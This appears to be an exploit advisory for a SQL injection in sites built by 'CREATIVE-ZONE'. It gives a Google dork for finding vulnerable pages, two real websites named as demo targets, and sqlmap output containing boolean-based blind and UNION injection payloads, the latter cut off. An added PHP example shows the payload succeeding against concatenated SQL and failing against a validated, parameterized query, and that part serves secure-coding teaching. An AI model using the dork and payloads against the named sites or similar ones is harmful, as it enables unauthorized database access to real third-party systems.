Exploit DESIGNED & DEVELOPED BY : CREATIVE-ZONE SQL Injection Tested BackBox GNU/Linux


Information Exploit

# Exploit Title : DESIGNED & DEVELOPED BY : CREATIVE-ZONE SQL Injection
# Google Dork : inurl:/about.php?id= | inurl:/Home.php?id=
# Date : 2020.05.05
# Exploit Author : Bl4ck M4n - cxsecurity.com
# Vendor Homepage : http://www.soccerexporter.com
# Software Link : -
# Version : -
# Tested on : BackBox 6
# CVE : N/A

Demo Target :
http://www.soccerexporter.com/about.php?id=5[SQL injection]
https://www.kindyrooindonesia.com/about.php?id=1[SQL injection]

Exploit Poc SQLMap :
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=5' AND 9436=9436 AND 'Tcea'='Tcea
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-5284'
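
The boolean-based payload above only works if the id value is pasted between quotes in the WHERE clause. The script below is an added example, not code from the vendor or the original advisory: it runs that payload against the concatenated pattern and against a validated, parameterized lookup. The pages table, its columns, both function names, the in-memory SQLite database and the second (false-condition) input are assumptions constructed so the script runs offline.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the site's database (assumption: a `pages` table keyed by integer id).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)');
$pdo->exec("INSERT INTO pages (id, body) VALUES (5, 'About us')");

// Vulnerable pattern implied by the PoC: the raw parameter is concatenated between quotes.
function aboutVulnerable(PDO $pdo, string $rawId): ?string
{
    $row = $pdo->query("SELECT body FROM pages WHERE id = '$rawId'")->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['body'];
}

// Hardened: accept only a positive integer, then bind it as a typed parameter.
function aboutHardened(PDO $pdo, string $rawId): ?string
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller should answer 400/404 and never echo database errors
    }
    $stmt = $pdo->prepare('SELECT body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['body'];
}

// First payload is the one from the sqlmap output; the last is a constructed false-condition twin.
$inputs = [
    '5',
    "5' AND 9436=9436 AND 'Tcea'='Tcea",
    "5' AND 9436=9437 AND 'Tcea'='Tcea",
];
foreach ($inputs as $in) {
    printf("%-40s vulnerable=%-12s hardened=%s\n",
        $in,
        var_export(aboutVulnerable($pdo, $in), true),
        var_export(aboutHardened($pdo, $in), true));
}
```

In the vulnerable function the true and false conditions produce different pages, which is the signal a boolean-based blind test relies on; the hardened function rejects both payloads before any SQL is built.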

Thank you...

Source : [cxsecurity]
